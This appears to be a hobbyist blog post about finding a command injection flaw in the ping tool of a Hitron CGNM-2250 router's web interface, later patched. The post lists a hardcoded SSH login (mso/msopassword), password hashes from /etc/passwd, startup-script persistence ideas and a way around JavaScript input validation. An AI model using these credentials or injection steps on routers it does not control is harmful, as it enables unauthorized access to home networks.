Remote code execution with Hitron CGNM-2250
Edit: This has been fixed in the latest firmare update 4.5.10.25
The routers that you receive from your ISP are almost always garbage: not many options to configure and pitiful wifi range. The router/modem that Shaw customers receive is the Hitron CGNM-2250 thankfully isn't completely terrible, 802.11ac plus gigabit ports. I was poking about and researching the model and came upon an exploit for a similar model version for remote code execution. The CGNM-2250 is vulnerable as well, for reference my software version is 4.5.8.20 with hardware version 1A. The input for the ping utility through the web interface isn't sanitized so you can enter arbitrary input. I discovered that it has a few basic utilities, including Dropbear.
From there you can ssh into your router with
ssh mso@192.168.0.1 -p 29
The password is msopassword (go figure!)
You'll be greeted with a fun menu driven interface.
Most of the menus are for debugging and initial programming purposes. There is a menu option to set the TFTP download image URL to flash the device, so it might be possible to flash your own firmware though I don't know how possible that is.
Going back to the web interface, I was able to see what tools and programs are available on the router.
It is your basic Linux system, busybox plus some manufacturer utilities. For a full list of binaries available see below:
#/sbin
wlanconfig
wifitool
wifirrm
watchdog
vconfig
utelnetd
udhcpd
udhcpc
udevstart
udevsend
udevd
udev
ti_udhcpc
ti_todc
ti_tftp
ti_syslogd
ti_dhcp6c
start-stop-daemon
route
rmmod
reboot
radartool
poweroff
pktlogdump
pktlogconf
manufacture_ath_throughput_sta
manufacture_ath_throughput_ap
makeVAP
lsmod
klogd
killVAP
iwpriv
iwlist
iwconfig
insmod
init
ifconfig
ht_wifi_ioctl
ht_atom_cmd
hostapd_cli
hostapd
halt
fsck.ext3
fdisk
cfg
blockdev
atomcmdlist
athstatsclr
athstats
athcfg_api
arp
apup
apstats
apdown
apcfg
activateVAP
80211stats
#/usr/bin
which
uptime
traceroute6
traceroute
tr
top
tftp
test
renice
pstree
pmap
mkfifo
logger
killall
hexdump
head
free
flock
find
expr
dirname
cut
crontab
basename
awk
add-shell
[[
[
#/bin
xmlwf
umount
touch
tar
sync
sleep
sh
sed
rm
pwd
ps
ping6
ping
pcap-config
netstat
mv
mount
more
mknod
mkdir
luac
lua
ls
login
ln
kill
iptunnel
iprule
iproute
iplink
ipaddr
ip
hostname
grep
getopt
false
echo
dnsdomainname
dmesg
df
dd
date
cp
clnkstat
clnkrst
clnkqos
clnkpm
clnkmocamib
clnkmem
clnkmcast
clnkhwtst
clnkfwupd
clnkcfg
clinkd
chown
chmod
cat
busybox
bash
ash
DCAP.46
DCAP.45
DCAP.44
DCAP.42
DCAP.41
DCAP.40
DCAP.38
DCAP.37
DCAP.35
DCAP.19
DCAP.18
DCAP.16
DCAP.137
DCAP.132
DCAP.126
DCAP.125
DCAP.123
DCAP.122
DCAP.116
DCAP.115
DCAP.112
DCAP.111
DCAP.110
DCAP.109
DCAP.107
DCAP.104
DCAP.103
DCAP.102
DCAP.101
DCAP.08
DCAP.03
DCAP.02
DCAP
CandDdvr.ko
##/usr/sbin
watchdog_rt
upstream_manager_1q
upstream_manager
upgradebox
update
testmode_handle.sh
testmode
sync_app_np_reboot
swdl2
sw_dl
snmpcmd
snmp_agent_cm
setstartup
setkey
setenv
sched
runall
rpc_reverse_server_util
rpc_reverse_server
rpc_management_server
rpc_ifconfig
rfs.cfg
rfs
regs
qos_dsx_sm
productionmode
printenv
pp_fw_download
portmap
pmap_set
pmap_dump
pcd
nvtst
nvread
mptint
mlx
logger
ledcfg
l2switch_iram.img
l2switch_init
l2switch_dram.img
iostat
iccctl
icc_genEvent
htxvendordb
ht_iwcmd
ht_buttond
hal_tuner_mgr
hal_event_mbox
hal_cmd_mbox
gptimer
gim
getenv
getPortByMAC.sh
flash_eraseall
fdump
ext_switch_init
eventmgr_cm
energy_manager_app
dpp_dev_init.sh
downstream_manager
docsis_mac_manager
docsis_mac_driver
docsis_init_once
docsis_dl_box
docsis_config_to_text
dmg_provisioning
dl
dispatcher
dfltr_class_init.sh
ddl
dbridge_mdf_init.sh
dbridge_l2vpn_ds_init.sh
dbridge_init
crond
cmdl
cm_status
cli_net.sh
cli_mem.sh
cli
chroot
cefdk
cc_init_once
brctl
bpi_tek
bpi_sa_map
bpi_auth
MxL_HRCLS_FW_4.1.5.5.mbin
MxL_HRCLS_FW.mbin
FwUpstreamDocsis3_I.bin
FwUpstreamDocsis3_D.bin
FwUpstreamDocsis2_I.bin
FwUpstreamDocsis2_D.bin
Through digging in the CLI menu I found that /etc/scripts/sys_startup.sh is ran on startup, making it a easier to inject any commands you want to run at startup. I haven't been able to get to a shell yet, since logging in with the 'mso' user it takes you to the CLI menu. But cat /etc/passwd reveals:
root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
mso:$1$1w7AswO3$IJCko5PwRk6ChJrIYgMQs/:100:100::/:/usr/sbin/cli
One should be able to symlink /bin/sh to /usr/sbin/cli so upon login it would drop to a shell. Entering commands via the web interface is a bit tricky since it doesn't like pipes (|), it's just a matter of getting around the JS validation. Once I can get to a shell I'll write a followup to this post Issue patched in version 4.5.10.25